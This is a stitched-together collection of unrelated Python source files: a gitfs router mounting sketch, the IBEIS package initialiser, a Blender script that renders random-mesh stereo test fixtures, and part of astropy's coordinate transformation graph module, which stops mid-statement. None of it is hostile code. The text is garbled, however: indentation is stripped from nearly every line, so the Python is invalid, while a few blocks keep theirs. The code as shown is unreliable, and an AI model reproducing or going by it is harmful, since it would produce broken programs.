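# The sketch below shows how the Router is meant to be wired together: clone
# on construction, register routes, then hand the router to fusepy. It is an
# illustrative example rather than gitfs's own mount script, and every
# argument value (routes, queue, size limits) is an assumption.
def _example_mount(remote_url, repo_path, mount_path, credentials,
                   routes, commit_queue):
    """Minimal usage sketch; not part of gitfs itself."""
    router = Router(
        remote_url=remote_url,
        repo_path=repo_path,
        mount_path=mount_path,
        credentials=credentials,
        commit_queue=commit_queue,       # queue-like object (assumed)
        max_size=10 * 1024 * 1024,       # illustrative 10 MiB limit
        max_offset=10 * 1024 * 1024,
        ignore_file=None,
        hard_ignore=None,
    )
    # Most specific regexes first: get_view() returns the first route whose
    # regex matches the incoming path.
    router.register(routes)
    # Every FUSE operation is then dispatched through Router.__call__ to the
    # view returned by get_view().
    return FUSE(router, mount_path, foreground=True)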
|
|
# -*- coding: utf-8 -*-
"""
IBEIS: main package init
TODO: LAZY IMPORTS?
http://code.activestate.com/recipes/473888-lazy-module-imports/
"""
# flake8: noqa
from __future__ import absolute_import, division, print_function, unicode_literals
try:
import utool as ut
import dtool
except ImportError as ex:
print('[ibeis !!!] ERROR: Unable to load all core utility modules.')
print('[ibeis !!!] Perhaps try super_setup.py pull')
raise
ut.noinject(__name__, '[ibeis.__init__]')
if ut.VERBOSE:
print('[ibeis] importing ibeis __init__')
if ut.is_developer():
standard_visualization_functions = [
'show_image',
'show_chip',
'show_chipmatch',
'show_chipmatches',
'show_vocabulary',
#'show_vocabulary',
]
# If we don't initialize plottool before <something>
# then it causes a crash on Windows. It's so freaking weird.
# something is not guitool, ibeis.viz
# has to be before control, can be after constants, params, and main_module
#import plottool
try:
from ibeis import constants
from ibeis import constants as const
from ibeis import params
from ibeis import main_module
from ibeis import other
from ibeis.init import sysres
#main_module._preload()
from ibeis import control
from ibeis import dbio
#from ibeis import web
from ibeis.init import sysres
from ibeis.main_module import (main, _preload, _init_numpy, main_loop,
test_main, opendb, opendb_in_background, opendb_bg_web)
from ibeis.control.IBEISControl import IBEISController
from ibeis.algo.hots.query_request import QueryRequest
from ibeis.algo.hots.chip_match import ChipMatch, AnnotMatch
from ibeis.init.sysres import (get_workdir, set_workdir, ensure_pz_mtest,
ensure_nauts, ensure_wilddogs, list_dbs)
from ibeis.init import main_helpers
from ibeis import algo
from ibeis import expt
from ibeis import templates
from ibeis.templates import generate_notebook
from ibeis.control.controller_inject import register_preprocs
from ibeis import core_annots
from ibeis import core_images
except Exception as ex:
ut.printex(ex, 'Error when importing ibeis', tb=True)
raise
def import_subs():
# Weird / Fancy loading.
# I want to make this simpler
from ibeis import algo
from ibeis import viz
from ibeis import web
from ibeis import gui
from ibeis import templates
def run_experiment(e='print', db='PZ_MTEST', a=['unctrl'], t=['default'],
initial_aids=None, qaid_override=None, daid_override=None,
lazy=False, **kwargs):
"""
Convenience function
CommandLine:
ibeis -e print
Args:
e (str): (default = 'print')
db (str): (default = 'PZ_MTEST')
a (list): (default = ['unctrl'])
t (list): (default = ['default'])
qaid_override (None): (default = None)
lazy (bool): (default = False)
Returns:
function: func - live python function
CommandLine:
python -m ibeis.__init__ --exec-run_experiment --show
Example:
>>> # DISABLE_DOCTEST
>>> from ibeis import * # NOQA
>>> e = 'rank_cdf'
>>> db = 'testdb1'
>>> a = ['default:species=primary']
>>> t = ['default']
>>> initial_aids = [2, 3, 4, 7, 9, 10, 11]
>>> qaid_override = [1, 9, 10, 11, 2, 3]
>>> testres = run_experiment(e, db, a, t, qaid_override=qaid_override,
>>> initial_aids=initial_aids)
>>> result = ('testres = %s' % (str(testres),))
>>> print(result)
>>> ut.quit_if_noshow()
>>> testres.draw_func()
>>> ut.show_if_requested()
"""
import functools
def find_expt_func(e):
import utool as ut
import ibeis.dev
for tup in ibeis.dev.REGISTERED_DOCTEST_EXPERIMENTS:
modname, funcname = tup[:2]
aliases = tup[2] if len(tup) == 3 else []
if e == funcname or e in aliases:
module = ut.import_modname(modname)
func = module.__dict__[funcname]
return func
# hack in --tf magic
func = ut.find_testfunc('ibeis', funcname)[0]
return func
def build_commandline(e=e, **kwargs):
# Equivalent command line version of this func
import ibeis.dev
valid_e_flags = ut.flatten([[tup[1]] if len(tup) == 2 else [tup[1]] + tup[2] for tup in ibeis.dev.REGISTERED_DOCTEST_EXPERIMENTS])
if e in valid_e_flags:
epref = '-e'
else:
# hack to use tf
epref = '--tf'
command_parts = ['ibeis',
epref, e,
'--db', db,
'-a', ' '.join(a).replace('(', '\(').replace(')', '\)'),
'-t', ' '.join(t),
]
if qaid_override is not None:
command_parts.extend(['--qaid=' + ','.join(map(str, qaid_override))])
if daid_override is not None:
command_parts.extend(['--daid-override=' + ','.join(map(str, daid_override))])
if 'disttype' in kwargs:
command_parts.extend(['--disttype=' + ','.join(map(str, kwargs['disttype']))])
# hack parse out important args that were on command line
if 'f' in kwargs:
command_parts.extend(['-f', ' '.join(kwargs['f'])])
if 'test_cfgx_slice' in kwargs:
# very hacky, much more than checking for f
slice_ = kwargs['test_cfgx_slice']
slice_attrs = [getattr(slice_, attr, '')
for attr in ['start', 'stop', 'step']]
slice_attrs = ut.replace_nones(slice_attrs, '')
slicestr = ':'.join(map(str, slice_attrs))
command_parts.extend(['--test_cfgx_slice', slicestr])
command_parts.extend(['--show'])
command_line_str = ' '.join(command_parts)
# Warning, not always equivalent
print('Equivalent Command Line:')
print(command_line_str)
return command_line_str
command_line_str = build_commandline(**kwargs)
def draw_cases(testres, **kwargs):
e_ = 'draw_cases'
func = find_expt_func(e_)
ibs = testres.ibs
build_commandline(e=e_, **kwargs)
lazy_func = functools.partial(func, ibs, testres, show_in_notebook=True, **kwargs)
return lazy_func
def draw_taghist(testres, **kwargs):
e_ = 'taghist'
func = find_expt_func(e_)
ibs = testres.ibs
build_commandline(e=e_, **kwargs)
lazy_func = functools.partial(func, ibs, testres, **kwargs)
return lazy_func
def execute_test():
func = find_expt_func(e)
assert func is not None, 'unknown experiment e=%r' % (e,)
argspec = ut.get_func_argspec(func)
if len(argspec.args) >= 2 and argspec.args[0] == 'ibs' and argspec.args[1] == 'testres':
# most experiments need a testres
expts_kw = dict(defaultdb=db, a=a, t=t,
qaid_override=qaid_override,
daid_override=daid_override,
initial_aids=initial_aids
)
testdata_expts_func = functools.partial(main_helpers.testdata_expts, **expts_kw)
ibs, testres = testdata_expts_func()
# Build the requested drawing function
draw_func = functools.partial(func, ibs, testres, **kwargs)
testres.draw_func = draw_func
ut.inject_func_as_method(testres, draw_cases)
ut.inject_func_as_method(testres, draw_taghist)
#testres.draw_cases = draw_cases
return testres
else:
raise AssertionError('Unknown type of function for experiment')
if lazy:
return execute_test
else:
testres = execute_test()
return testres
def testdata_expts(*args, **kwargs):
ibs, testres = main_helpers.testdata_expts(*args, **kwargs)
return testres
#import_subs()
#from ibeis import gui
#from ibeis import algo
#from ibeis import templates
#from ibeis import viz
#from ibeis import web
#class _VizProxy(object):
# def __init__(self):
# pass
# def getattr(self, key):
# import ibeis.viz as viz
# return getattr(viz, key)
# def setattr(self, key, val):
# import ibeis.viz as viz
# return getattr(viz, key, val)
#viz = _VizProxy
#import apipkg
#apipkg.initpkg(__name__, {
# 'viz': {
# 'clone': "ibeis.viz",
# }
#}
#)
from ibeis.init import main_helpers
testdata_cm = main_helpers.testdata_cm
testdata_cmlist = main_helpers.testdata_cmlist
testdata_qreq_ = main_helpers.testdata_qreq_
testdata_pipecfg = main_helpers.testdata_pipecfg
testdata_filtcfg = main_helpers.testdata_filtcfg
testdata_expts = main_helpers.testdata_expts
testdata_expanded_aids = main_helpers.testdata_expanded_aids
testdata_aids = main_helpers.testdata_aids
# Utool generated init makeinit.py
print, rrr, profile = ut.inject2(__name__, '[ibeis]')
def reload_subs(verbose=True):
""" Reloads ibeis and submodules """
import_subs()
rrr(verbose=verbose)
getattr(constants, 'rrr', lambda verbose: None)(verbose=verbose)
getattr(main_module, 'rrr', lambda verbose: None)(verbose=verbose)
getattr(params, 'rrr', lambda verbose: None)(verbose=verbose)
getattr(other, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(dbio, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(algo, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(control, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(viz, 'reload_subs', lambda: None)()
getattr(gui, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(algo, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(viz, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(web, 'reload_subs', lambda verbose: None)(verbose=verbose)
rrr(verbose=verbose)
rrrr = reload_subs
from ibeis.control.DB_SCHEMA_CURRENT import VERSION_CURRENT
__version__ = VERSION_CURRENT
__version__ = '1.5.4'
if __version__ != VERSION_CURRENT:
raise AssertionError(
'need to update version in __init__ file from %r to %r so setup.py can work nicely' % (
__version__, VERSION_CURRENT))
"""
Regen Command:
Kinda have to work with the output of these. This module is hard to
autogenerate correctly.
cd /home/joncrall/code/ibeis/ibeis/other
makeinit.py -x web viz tests gui all_imports
makeinit.py -x constants params main_module other control dbio tests all_imports
"""
if __name__ == '__main__':
r"""
CommandLine:
python -m ibeis
python -m ibeis --allexamples
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
|
|
#!/usr/bin/env python3
# Copyright (c) 2014 The Caroline authors. All rights reserved.
# Use of this source file is governed by a MIT license that can be found in the
# LICENSE file.
# Author: Aleksandr Derbenev <alex@technoworks.ru>
import json
from optparse import OptionParser
import os
import shutil
import random
import math
import bpy
class Bounds(object):
def __init__(self, camera):
self.angle_x = camera.angle_x
self.angle_y = camera.angle_y
self.angle = camera.angle
self.clip_near = camera.clip_start
self.clip_far = camera.clip_end
def random_mesh_origin(angle_x, angle_y, clip_near, clip_far):
"""Create random origin point for mesh. Assume that object will be visible if
it's origin is in the truncated pyramid."""
# Get z coordinate first because x and y ranges depends from it.
z = random.uniform(clip_near + 2, clip_far - 2)
x = random.uniform(-math.tan(angle_x / 2) * z,
math.tan(angle_x / 2) * z / 2)
y = random.uniform(-math.tan(angle_y / 2) * z,
math.tan(angle_y / 2) * z / 2)
return [x, y, -z]
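# Worked illustration of the sampling above (numbers are arbitrary examples):
# with angle_x = 1.0 rad and a drawn z of 10, the x bounds are
#   [-math.tan(0.5) * 10, math.tan(0.5) * 10 / 2] ~= [-5.46, 2.73],
# so the origin stays within (an asymmetric slice of) the horizontal field of
# view at that depth; the y bounds follow the same pattern using angle_y.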
def random_mesh_rotation():
"""Generate random angles for initial mesh rotation."""
return [random.random(), random.random(), random.random()]
def random_mesh_constructor():
"""Returs lambda for creating a random mesh with given origin point and
rotation."""
def dimension(max_size):
"""Return random value for dimension."""
return random.uniform(max_size / 10, max_size)
return random.choice((
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_cone_add(radius1 = dimension(max_size) / 2,
radius2 = dimension(max_size) / 2, depth = dimension(max_size),
end_fill_type='TRIFAN',
location=origin, rotation=rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_cube_add(radius = dimension(max_size) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_cylinder_add(radius = dimension(max_size) / 2,
depth = dimension(max_size),
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_ico_sphere_add(size = dimension(max_size) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_monkey_add(radius = dimension(max_size) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_plane_add(radius = dimension(max_size) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_torus_add(
major_radius = random.uniform(max_size / 4, max_size) / 2,
minor_radius = dimension(max_size / 5) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_uv_sphere_add(size = dimension(max_size) / 2,
location = origin, rotation = rotation)
))
def override_context(options):
"""Copy bpy.context and replace some values by provided in dictionary."""
context = bpy.context.copy()
for key in options.keys():
context[key] = options[key]
return context
def parse_options():
"""Configure and run command line arguments parser."""
parser = OptionParser()
parser.add_option('-f', '--fixtures', dest = 'count', type = 'int',
default = 1, action = 'store',
help = 'Number of test fixtures to generate.')
parser.add_option('-m', '--meshes', dest = 'meshes', type = 'int',
default = 1, action = 'store',
help = 'Maximum number of meshes in the scene.')
parser.add_option('-o', '--output', dest = 'output', type = 'string',
default = 'fixture', action = 'store',
help = 'Name of the output directory. You can use %n for fixture number.')
parser.add_option('-d', '--distance', dest = 'distance', type = 'float',
default = 0.08, action = 'store',
help = 'Distance between cameras in meters.')
(options, args) = parser.parse_args()
if options.count < 1:
parser.error('Count of fixtures must be a positive integer.')
if options.meshes < 1:
parser.error('Maximum count of meshes must be a positive integer.')
if options.count > 1 and '%n' not in options.output:
options.output += '.%n'
if options.distance <= 0:
parser.error('Distance must be greater than 0.')
options.output = options.output.replace('%n', '{number}')
return (options, args)
def get_camera():
camera = None
for cam in bpy.data.cameras:
if cam.name in bpy.context.scene.objects.keys():
camera = cam
break
camera_object = bpy.data.objects[camera.name]
return (camera, camera_object)
def cleanup_scene():
"""Cleanup current scene"""
for item in bpy.data.meshes:
if item.name in bpy.context.scene.objects.keys():
bpy.context.scene.objects.unlink(bpy.data.objects[item.name])
def generate_mesh(bounds):
"""Count location and rotation for mesh, get and call constructor."""
origin = random_mesh_origin(bounds.angle_x, bounds.angle_y,
bounds.clip_near, bounds.clip_far)
rotation = random_mesh_rotation()
max_size = - origin[2] * math.tan(bounds.angle / 2)
random_mesh_constructor()(origin=origin, rotation=rotation,
max_size=max_size)
def generate_meshes(count, bounds):
"""Generate meshes on the scene."""
for i in range(count):
generate_mesh(bounds = bounds)
def setup_light(bounds):
"""Find and set lamp to the appropriate location."""
# Reuse the first lamp in the blend file if there is one, otherwise create a sun lamp.
lamp = bpy.data.lamps[0] if len(bpy.data.lamps) > 0 else None
if lamp is None:
    lamp = bpy.data.lamps.new(name='lamp', type='SUN')
lamp_object = bpy.data.objects.get(lamp.name)
if lamp_object is None:
    lamp_object = bpy.data.objects.new(lamp.name, lamp)
if lamp.name not in bpy.context.scene.objects:
    bpy.context.scene.objects.link(lamp_object)
lamp_location = [
0.0,
math.tan(bounds.angle) * bounds.clip_far,
-(bounds.clip_far - bounds.clip_near) / 2
]
lamp.type = 'SUN'
lamp_object.location = lamp_location
lamp_object.rotation_mode = 'XYZ'
lamp_object.rotation_euler = [0, - math.pi / 2, 0]
def prepare_dir(name):
"""Remove fixture directory if it exists. Create new one."""
if os.path.exists(name):
shutil.rmtree(name)
os.mkdir(name)
def save_models(name):
"""Save each mesh to the Standford ply file. Return scene dictionary for
config."""
scene = {}
for mesh in bpy.data.meshes:
if mesh.name in bpy.context.scene.objects.keys():
mesh_ply = mesh.name + '.ply'
bpy.ops.export_mesh.ply(override_context({'selected_objects': mesh}),
filepath=os.path.join(name, mesh_ply), check_existing=False,
use_mesh_modifiers=False, use_normals=False, use_uv_coords=False,
use_colors=False)
scene[mesh.name] = mesh_ply
return scene
def render_frames(name, distance, camera, camera_object, bounds):
"""Setup camera and render two frames."""
cameras = []
for i, location in enumerate([
[-distance / 2, 0, 0],
[distance / 2, 0, 0]
]):
render = bpy.context.scene.render
width = render.resolution_x
height = render.resolution_y
cam_name = 'camera_' + str(i)
render.filepath = os.path.join(name, cam_name + '.png')
camera_object.location = location
camera_object.rotation_mode = 'XYZ'
camera_object.rotation_euler = [0, 0, 0]
bpy.ops.render.render(animation=False, write_still=True)
cam = {
'focus': camera.lens / 1000.0,
'pixel_size': camera.sensor_width / width / 1000.0,
'width': width,
'height': height,
'position': camera_object.location[:],
'rotation': camera_object.rotation_euler[:],
'type': 'image',
'source': camera.name + '.png'
}
cameras.append(cam)
return cameras
def save_config(name, config):
"""Generate config.json for given fixture."""
config_file = open(os.path.join(name, 'config.json'), 'w')
json.dump(config, config_file, skipkeys=True, ensure_ascii=False,
allow_nan=False, indent=2, sort_keys=True)
config_file.write('\n')
def save_fixture(name, distance, camera, camera_object, bounds):
prepare_dir(name = name)
config = {}
config['scene'] = save_models(name = name)
config['cameras'] = render_frames(name = name, distance = distance,
camera = camera, camera_object = camera_object, bounds = bounds)
save_config(name = name, config = config)
def generate_fixture(name, meshes, distance):
"""Generate and save a fixture."""
name = os.path.normpath(name)
(camera, camera_object) = get_camera()
bounds = Bounds(camera)
cleanup_scene()
generate_meshes(count = meshes, bounds = bounds)
setup_light(bounds = bounds)
save_fixture(name = name, distance = distance, camera=camera,
camera_object=camera_object, bounds=bounds)
def generate_fixtures(count, output, meshes, distance):
"""Generate all fixtures."""
for i in range(count):
generate_fixture(name = output.format(number = i),
meshes = random.randrange(meshes) + 1, distance = distance)
def main():
"""Entry point."""
(options, args) = parse_options()
generate_fixtures(count = options.count, output = options.output,
meshes = options.meshes, distance = options.distance)
if __name__ == '__main__':
main()
|
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module contains a general framework for defining graphs of transformations
between coordinates, suitable for either spatial coordinates or more generalized
coordinate systems.
The fundamental idea is that each class is a node in the transformation graph,
and transitions from one node to another are defined as functions (or methods)
wrapped in transformation objects.
This module also includes more specific transformation classes for
celestial/spatial coordinate frames, generally focused around matrix-style
transformations that are typically how the algorithms are defined.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import heapq
import inspect
import subprocess
from abc import ABCMeta, abstractmethod
from collections import defaultdict
import numpy as np
from ..utils.compat import ignored
from ..utils.compat.funcsigs import signature
from ..extern import six
__all__ = ['TransformGraph', 'CoordinateTransform', 'FunctionTransform',
'StaticMatrixTransform', 'DynamicMatrixTransform', 'CompositeTransform']
class TransformGraph(object):
"""
A graph representing the paths between coordinate frames.
"""
def __init__(self):
self._graph = defaultdict(dict)
self.invalidate_cache()  # initializes the cache attributes
@property
def _cached_names(self):
if self._cached_names_dct is None:
self._cached_names_dct = dct = {}
for c in self.frame_set:
nm = getattr(c, 'name', None)
if nm is not None:
dct[nm] = c
return self._cached_names_dct
@property
def frame_set(self):
"""
A `set` of all the frame classes present in this `TransformGraph`.
"""
if self._cached_frame_set is None:
self._cached_frame_set = frm_set = set()
for a in self._graph:
frm_set.add(a)
for b in self._graph[a]:
frm_set.add(b)
return self._cached_frame_set.copy()
def invalidate_cache(self):
"""
Invalidates the cache that stores optimizations for traversing the
transform graph. This is called automatically when transforms
are added or removed, but will need to be called manually if
weights on transforms are modified in place.
"""
self._cached_names_dct = None
self._cached_frame_set = None
self._shortestpaths = {}
self._composite_cache = {}
def add_transform(self, fromsys, tosys, transform):
"""
Add a new coordinate transformation to the graph.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
transform : CoordinateTransform or similar callable
The transformation object. Typically a `CoordinateTransform` object,
although it may be some other callable that is called with the same
signature.
Raises
------
TypeError
If ``fromsys`` or ``tosys`` are not classes or ``transform`` is
not callable.
"""
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
if not six.callable(transform):
raise TypeError('transform must be callable')
self._graph[fromsys][tosys] = transform
self.invalidate_cache()
def remove_transform(self, fromsys, tosys, transform):
"""
Removes a coordinate transform from the graph.
Parameters
----------
fromsys : class or `None`
The coordinate frame *class* to start from. If `None`,
``transform`` will be searched for and removed (``tosys`` must
also be `None`).
tosys : class or `None`
The coordinate frame *class* to transform into. If `None`,
``transform`` will be searched for and removed (``fromsys`` must
also be `None`).
transform : callable or `None`
The transformation object to be removed or `None`. If `None`
and ``tosys`` and ``fromsys`` are supplied, there will be no
check to ensure the correct object is removed.
"""
if fromsys is None or tosys is None:
if not (tosys is None and fromsys is None):
raise ValueError('fromsys and tosys must both be None if either are')
if transform is None:
raise ValueError('cannot give all Nones to remove_transform')
# search for the requested transform by brute force and remove it
for a in self._graph:
    agraph = self._graph[a]
    for b in agraph:
        # the transform object is the value, not the key
        if agraph[b] is transform:
            del agraph[b]
            break
    else:
        # not found under this starting frame; keep looking
        continue
    break
else:
    raise ValueError('Could not find transform {0} in the '
                     'graph'.format(transform))
else:
if transform is None:
self._graph[fromsys].pop(tosys, None)
else:
curr = self._graph[fromsys].get(tosys, None)
if curr is transform:
self._graph[fromsys].pop(tosys)
else:
raise ValueError('Current transform from {0} to {1} is not '
'{2}'.format(fromsys, tosys, transform))
self.invalidate_cache()
def find_shortest_path(self, fromsys, tosys):
"""
Computes the shortest distance along the transform graph from
one system to another.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
Returns
-------
path : list of classes or `None`
The path from ``fromsys`` to ``tosys`` as an in-order sequence
of classes. This list includes *both* ``fromsys`` and
``tosys``. Is `None` if there is no possible path.
distance : number
The total distance/priority from ``fromsys`` to ``tosys``. If
priorities are not set this is the number of transforms
needed. Is ``inf`` if there is no possible path.
"""
inf = float('inf')
# special-case the 0 or 1-path
if tosys is fromsys:
if tosys not in self._graph[fromsys]:
# Means there's no transform necessary to go from it to itself.
return [tosys], 0
if tosys in self._graph[fromsys]:
# this will also catch the case where tosys is fromsys, but has
# a defined transform.
t = self._graph[fromsys][tosys]
return [fromsys, tosys], float(t.priority if hasattr(t, 'priority') else 1)
#otherwise, need to construct the path:
if fromsys in self._shortestpaths:
# already have a cached result
fpaths = self._shortestpaths[fromsys]
if tosys in fpaths:
return fpaths[tosys]
else:
return None, inf
# use Dijkstra's algorithm to find shortest path in all other cases
nodes = []
# first make the list of nodes
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
if fromsys not in nodes or tosys not in nodes:
# fromsys or tosys are isolated or not registered, so there's
# certainly no way to get from one to the other
return None, inf
edgeweights = {}
# construct another graph that is a dict of dicts of priorities
# (used as edge weights in Dijkstra's algorithm)
for a in self._graph:
edgeweights[a] = aew = {}
agraph = self._graph[a]
for b in agraph:
aew[b] = float(agraph[b].priority if hasattr(agraph[b], 'priority') else 1)
# entries in q are [distance, count, nodeobj, pathlist]
# count is needed because in py 3.x, tie-breaking fails on the nodes.
# this way, insertion order is preserved if the weights are the same
q = [[inf, i, n, []] for i, n in enumerate(nodes) if n is not fromsys]
q.insert(0, [0, -1, fromsys, []])
# this dict will store the distance to node from ``fromsys`` and the path
result = {}
# definitely starts as a valid heap because of the insert line; from the
# node to itself is always the shortest distance
while len(q) > 0:
d, orderi, n, path = heapq.heappop(q)
if d == inf:
# everything left is unreachable from fromsys, just copy them to
# the results and jump out of the loop
result[n] = (None, d)
for d, orderi, n, path in q:
result[n] = (None, d)
break
else:
result[n] = (path, d)
path.append(n)
if n not in edgeweights:
# this is a system that can be transformed to, but not from.
continue
for n2 in edgeweights[n]:
if n2 not in result:  # skip nodes that have already been finalized
# find where n2 is in the heap
for i in range(len(q)):
if q[i][2] == n2:
break
else:
raise ValueError('n2 not in heap - this should be impossible!')
newd = d + edgeweights[n][n2]
if newd < q[i][0]:
q[i][0] = newd
q[i][3] = list(path)
heapq.heapify(q)
# cache for later use
self._shortestpaths[fromsys] = result
return result[tosys]
def get_transform(self, fromsys, tosys):
"""
Generates and returns the `CompositeTransform` for a transformation
between two coordinate systems.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
Returns
-------
trans : `CompositeTransform` or `None`
If there is a path from ``fromsys`` to ``tosys``, this is a
transform object for that path. If no path could be found, this is
`None`.
Notes
-----
This function always returns a `CompositeTransform`, because
`CompositeTransform` is slightly more adaptable in the way it can be
called than other transform classes. Specifically, it takes care of
intermediate steps of transformations in a way that is consistent with
1-hop transformations.
"""
if not inspect.isclass(fromsys):
raise TypeError('fromsys is not a class')
if not inspect.isclass(tosys):
raise TypeError('tosys is not a class')
path, distance = self.find_shortest_path(fromsys, tosys)
if path is None:
return None
transforms = []
currsys = fromsys
for p in path[1:]: # first element is fromsys so we skip it
transforms.append(self._graph[currsys][p])
currsys = p
fttuple = (fromsys, tosys)
if fttuple not in self._composite_cache:
comptrans = CompositeTransform(transforms, fromsys, tosys,
register_graph=False)
self._composite_cache[fttuple] = comptrans
return self._composite_cache[fttuple]
def lookup_name(self, name):
"""
Tries to locate the coordinate class with the provided alias.
Parameters
----------
name : str
The alias to look up.
Returns
-------
coordcls
The coordinate class corresponding to the ``name`` or `None` if
no such class exists.
"""
return self._cached_names.get(name, None)
def get_names(self):
"""
Returns all available transform names. They will all be
valid arguments to `lookup_name`.
Returns
-------
nms : list
The aliases for coordinate systems.
"""
return list(six.iterkeys(self._cached_names))
def to_dot_graph(self, priorities=True, addnodes=[], savefn=None,
savelayout='plain', saveformat=None):
"""
Converts this transform graph to the graphviz_ DOT format.
Optionally saves it (requires `graphviz`_ be installed and on your path).
.. _graphviz: http://www.graphviz.org/
Parameters
----------
priorities : bool
If `True`, show the priority values for each transform. Otherwise,
they will not be included in the graph.
addnodes : sequence of str
Additional coordinate systems to add (this can include systems
already in the transform graph, but they will only appear once).
savefn : `None` or str
The file name to save this graph to or `None` to not save
to a file.
savelayout : str
The graphviz program to use to layout the graph (see
graphviz_ for details) or 'plain' to just save the DOT graph
content. Ignored if ``savefn`` is `None`.
saveformat : str
The graphviz output format. (e.g. the ``-Txxx`` option for
the command line program - see graphviz docs for details).
Ignored if ``savefn`` is `None`.
Returns
-------
dotgraph : str
A string with the DOT format graph.
"""
nodes = []
# find the node names
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
for node in addnodes:
if node not in nodes:
nodes.append(node)
nodenames = []
invclsaliases = dict([(v, k) for k, v in six.iteritems(self._cached_names)])
for n in nodes:
if n in invclsaliases:
nodenames.append('{0} [shape=oval label="{0}\\n`{1}`"]'.format(n.__name__, invclsaliases[n]))
else:
nodenames.append(n.__name__ + '[ shape=oval ]')
edgenames = []
# Now the edges
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
pri = agraph[b].priority if hasattr(agraph[b], 'priority') else 1
edgenames.append((a.__name__, b.__name__, pri))
# generate simple dot format graph
lines = ['digraph AstropyCoordinateTransformGraph {']
lines.append('; '.join(nodenames) + ';')
for enm1, enm2, weights in edgenames:
labelstr = '[ label = "{0}" ]'.format(weights) if priorities else ''
lines.append('{0} -> {1}{2};'.format(enm1, enm2, labelstr))
lines.append('')
lines.append('overlap=false')
lines.append('}')
dotgraph = '\n'.join(lines)
if savefn is not None:
if savelayout == 'plain':
with open(savefn, 'w') as f:
f.write(dotgraph)
else:
args = [savelayout]
if saveformat is not None:
args.append('-T' + saveformat)
proc = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate(dotgraph)
if proc.returncode != 0:
raise IOError('problem running graphviz: \n' + stderr)
with open(savefn, 'w') as f:
f.write(stdout)
return dotgraph
def to_networkx_graph(self):
"""
Converts this transform graph into a networkx graph.
.. note::
You must have the `networkx <http://networkx.lanl.gov/>`_
package installed for this to work.
Returns
-------
nxgraph : `networkx.Graph <http://networkx.lanl.gov/reference/classes.graph.html>`_
This `TransformGraph` as a `networkx.Graph`_.
"""
import networkx as nx
nxgraph = nx.Graph()
# first make the nodes
for a in self._graph:
if a not in nxgraph:
nxgraph.add_node(a)
for b in self._graph[a]:
if b not in nxgraph:
nxgraph.add_node(b)
# Now the edges
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
pri = agraph[b].priority if hasattr(agraph[b], 'priority') else 1
nxgraph.add_edge(a, b, weight=pri)
return nxgraph
def transform(self, transcls, fromsys, tosys, priority=1):
"""
A function decorator for defining transformations.
.. note::
If decorating a static method of a class, ``@staticmethod``
should be added *above* this decorator.
Parameters
----------
transcls : class
The class of the transformation object to create.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
Returns
-------
deco : function
A function that can be called on another function as a decorator
(see example).
Notes
-----
This decorator assumes the first argument of the ``transcls``
initializer accepts a callable, and that the second and third
are ``fromsys`` and ``tosys``. If this is not true, you should just
initialize the class manually and use `add_transform` instead of
using this decorator.
Examples
--------
::
graph = TransformGraph()
class Frame1(BaseCoordinateFrame):
...
class Frame2(BaseCoordinateFrame):
...
@graph.transform(FunctionTransform, Frame1, Frame2)
def f1_to_f2(f1_obj):
... do something with f1_obj ...
return f2_obj
"""
def deco(func):
# this doesn't do anything directly with the transform because
# ``register_graph=self`` stores it in the transform graph
# automatically
transcls(func, fromsys, tosys, priority=priority,
register_graph=self)
return func
return deco
#<--------------------Define the builtin transform classes--------------------->
@six.add_metaclass(ABCMeta)
class CoordinateTransform(object):
"""
An object that transforms a coordinate from one system to another.
Subclasses must implement `__call__` with the provided signature.
They should also call this superclass's ``__init__`` in their
``__init__``.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
"""
def __init__(self, fromsys, tosys, priority=1, register_graph=None):
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
self.fromsys = fromsys
self.tosys = tosys
self.priority = float(priority)
if register_graph:
# this will do the type-checking when it adds to the graph
self.register(register_graph)
else:
if not inspect.isclass(fromsys) or not inspect.isclass(tosys):
raise TypeError('fromsys and tosys must be classes')
self.overlapping_frame_attr_names = overlap = []
if (hasattr(fromsys, 'get_frame_attr_names') and
